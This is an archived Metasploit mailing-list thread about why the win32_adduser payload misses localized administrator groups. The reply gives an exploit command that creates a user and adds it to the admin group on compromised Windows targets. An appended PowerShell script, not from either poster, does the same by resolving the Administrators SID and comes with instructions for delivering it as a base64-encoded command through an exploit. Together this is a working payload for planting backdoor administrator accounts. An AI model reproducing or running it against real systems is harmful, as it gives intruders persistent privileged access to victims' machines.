Metasploit mailing list archives

Win32 net user /add payload


From: hdm at metasploit.com (H D Moore)
Date: Thu, 3 Mar 2005 18:34:41 -0600

Hello,

The win32_adduser payload is actually just a wrapper around the 
"win32_exec" payload. If you are exploiting any non-English target, the 
administrator group name has to be changed. The easy way is to just run 
the command manually with win32_exec:

msf exploit_name(win32_exec) > set CMD "cmd.exe /c net user USER PASS /ADD && net localgroup ADMINGROUP USER /ADD"

msf exploit_name(win32_exec) > exploit

In the future, we may add an option to this payload to specify the 
language or just the name of the group -- it seems to come up often 
enough =) 

-HD

On Thursday 03 March 2005 18:29, Thomas Schmidt wrote:
Hi list,
I noticed a problem with the "net user x x /add" payload on a German
Win2k SP4. I was able to successfully run some exploits using this
payload, thereby creating a new user "test" - but this user was not
added to the "Administratoren" group (notice the slightly different
spelling of the group name on a German W2k box). Is this a
language-specific problem or did I get something wrong? If it is
language-specific, how do I change the shellcode?

Regards,
Thomas
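
Added example, not from either post and not Metasploit's own payload code: a PowerShell version of the same two net.exe commands that resolves the built-in Administrators group from its well-known SID S-1-5-32-544 instead of hard-coding "Administrators" or "Administratoren". It assumes PowerShell on the target (the Windows 2000 SP4 box in this thread would not have had it, so there the manual win32_exec route above is the only option); the $User and $Pass parameter names are my own.

```powershell
# Added example (not from the list post or from Metasploit). Creates a local user and
# adds it to the built-in Administrators group located by its well-known SID, so the
# localized group name never has to be typed. Assumes PowerShell on the target.
param(
    [Parameter(Mandatory = $true)][string]$User,
    [Parameter(Mandatory = $true)][string]$Pass
)

# S-1-5-32-544 is the well-known SID of BUILTIN\Administrators on every Windows install,
# whatever the display language.
$adminSid = 'S-1-5-32-544'

# Translate the SID to the account name the OS actually uses, e.g. "BUILTIN\Administratoren"
# on German Windows, and keep only the group part for net.exe.
$sid = New-Object System.Security.Principal.SecurityIdentifier($adminSid)
$adminGroup = $sid.Translate([System.Security.Principal.NTAccount]).Value.Split('\')[-1]

# Same two commands the win32_adduser payload runs, with the resolved group name filled in.
& net user $User $Pass /ADD
if ($LASTEXITCODE -ne 0) { throw "net user failed with exit code $LASTEXITCODE" }
& net localgroup $adminGroup $User /ADD
if ($LASTEXITCODE -ne 0) { throw "net localgroup failed with exit code $LASTEXITCODE" }

# Verify membership by SID as well (Get-LocalGroupMember needs PowerShell 5.1 or later);
# member names come back as COMPUTERNAME\user.
$members = Get-LocalGroupMember -SID $adminSid | Select-Object -ExpandProperty Name
if ($members -notcontains "$env:COMPUTERNAME\$User") {
    throw "$User was not added to $adminGroup"
}
"$User added to $adminGroup (SID $adminSid)"
```

To hand this to win32_exec on a target that does have PowerShell, wrap the script in `powershell -NoProfile -EncodedCommand <base64 of the UTF-16LE script>` as the CMD value; that avoids quoting the nested double quotes inside the exploit's set CMD line.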


